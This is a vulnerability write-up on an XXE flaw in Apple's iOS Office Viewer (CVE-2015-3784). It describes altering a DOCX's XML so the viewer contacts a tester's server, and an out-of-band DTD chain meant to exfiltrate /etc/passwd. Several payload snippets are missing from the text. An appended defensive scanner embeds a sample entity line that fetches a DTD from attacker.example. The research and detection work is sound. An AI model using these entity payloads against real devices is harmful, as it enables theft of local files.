

XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)

This article summarises the discovery and analysis of the XXE vulnerability in Apple iOS Office Viewer (CVE-2015-3784). It assumes the reader already has a basic understanding of XXE attacks. Tests were performed on a jailbroken iOS device for analysis purposes, although the results were later confirmed on a stock ("jailed") iOS. For this article we also used Safari as an example, but any iOS application that uses the internal Office Viewer (from the QuickLook framework) should behave similarly.

XML eXternal Entity (XXE) vulnerabilities are a dime a dozen. Our experience tells us that they are quite prevalent in applications, especially when handling files whose format is XML. Such is the case of Microsoft Office OOXML files, among other similar file formats such as older Apple Keynote .key files or OpenOffice documents, which are basically ZIP archives of multiple XML files. This article focuses specifically on the DOCX file format, but PPTX/XLSX are basically the same, and on other formats the technique is similar.

Unzipping a DOCX file creates the following structure, which we will change to include our XXE attack:

$ unzip xxe.docx

Looking at the file structure, you'll see that there are a lot of XML files to play with. The one we picked, .xml, works well for the XXE: include the following after its first line:

You just need to update the DOCX file, and it's done:

$ zip -u xxe.docx \.xml

If the document parsing application/library is vulnerable to XXE, it will connect via HTTP to the webserver running on 192.168.1.1 port 8000 and request the file "XXE". Testing this on a vulnerable iOS by using Safari to load the xxe.docx file, we get confirmation that it works:

192.168.1.2 - "GET /xxe.docx HTTP/1.1" 200 -
192.168.1.2 - "GET /XXE HTTP/1.0" 200 -

On the first line we see Safari accessing the xxe.docx; it then parses it and executes our XXE request. This is fun, but can we do anything else? Actually, by manipulating entities and parameter entities, it is possible in some cases to remotely read files out of band.

So, since the SYSTEM functionality in XML is actually there to load other DTDs, which can define new entities and formats, we update our .xml file and create a specific external DTD file that will allow us to read a file and get its contents back to us:

The above will load a DTD from our controlled server and then execute the %all and %send entities, which are defined in the send.dtd file:

The above file will attempt to read /etc/passwd, and its contents will end up in the "file" entity. Then we create a new entity (you should read the above-mentioned PDF, if you haven't yet) that will perform a request to our webserver with the contents as a parameter of the request. Again, trying this on a vulnerable iOS, it partially fails:

192.168.1.2 - "GET /xxe.docx HTTP/1.1" 200 -
192.168.1.2 - "GET /send.dtd HTTP/1.0" 200 -

So, Safari did read the docx and did read the send.dtd file, but no contents came back. This can be for a number of reasons, such as permissions or sandboxing.
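Because an OOXML document is just a ZIP of XML parts, the cheapest defensive check before handing such a file to a viewer is to look for the very thing this article abuses: a DOCTYPE with external or parameter entities inside any XML part. The scanner below is an added example written for this page, not code from the article or from Apple; it works on raw bytes so it can never resolve an entity itself, and it builds its own constructed sample archives (the host attacker.example is a placeholder).

```python
import io
import re
import zipfile

# Byte-level patterns checked in every XML part of the archive. Real OOXML parts
# never carry a DOCTYPE, so any of these is worth flagging, not just the exfil chain.
XXE_INDICATORS = {
    "doctype": re.compile(rb"<!DOCTYPE\b", re.IGNORECASE),
    "external-entity": re.compile(rb"<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE),
    "parameter-entity": re.compile(rb"<!ENTITY\s+%", re.IGNORECASE),
}
MAX_PART_BYTES = 4 * 1024 * 1024  # bound decompression so a crafted archive cannot exhaust memory


def scan_ooxml_for_xxe(archive):
    """Return [(member_name, indicator), ...] for each XML/.rels part showing XXE
    indicators. `archive` is a path or file-like object. No XML parser is used,
    so the scanner cannot be tricked into fetching a DTD or reading a file."""
    findings = []
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            with zf.open(info) as part:
                data = part.read(MAX_PART_BYTES)
            for name, pattern in XXE_INDICATORS.items():
                if pattern.search(data):
                    findings.append((info.filename, name))
    return findings


def build_sample_docx(with_xxe):
    """Constructed minimal DOCX-like archive for demonstration (not a real document)."""
    doc = b'<?xml version="1.0" encoding="UTF-8"?>\n'
    if with_xxe:
        # Constructed payload of the shape the article describes: a parameter entity
        # that pulls an external DTD. attacker.example is a placeholder host.
        doc += (b'<!DOCTYPE w:document [<!ENTITY % ext SYSTEM '
                b'"http://attacker.example/send.dtd"> %ext;]>\n')
    doc += (b'<w:document xmlns:w="http://schemas.openxmlformats.org/'
            b'wordprocessingml/2006/main"><w:body/></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns='
                    '"http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", doc)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for label, flag in (("benign", False), ("xxe", True)):
        print(label, scan_ooxml_for_xxe(build_sample_docx(flag)))
```

A hit on "doctype" alone is already a reason to quarantine the file, since the viewer should never need one; the other two indicators tell you how far the payload goes.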
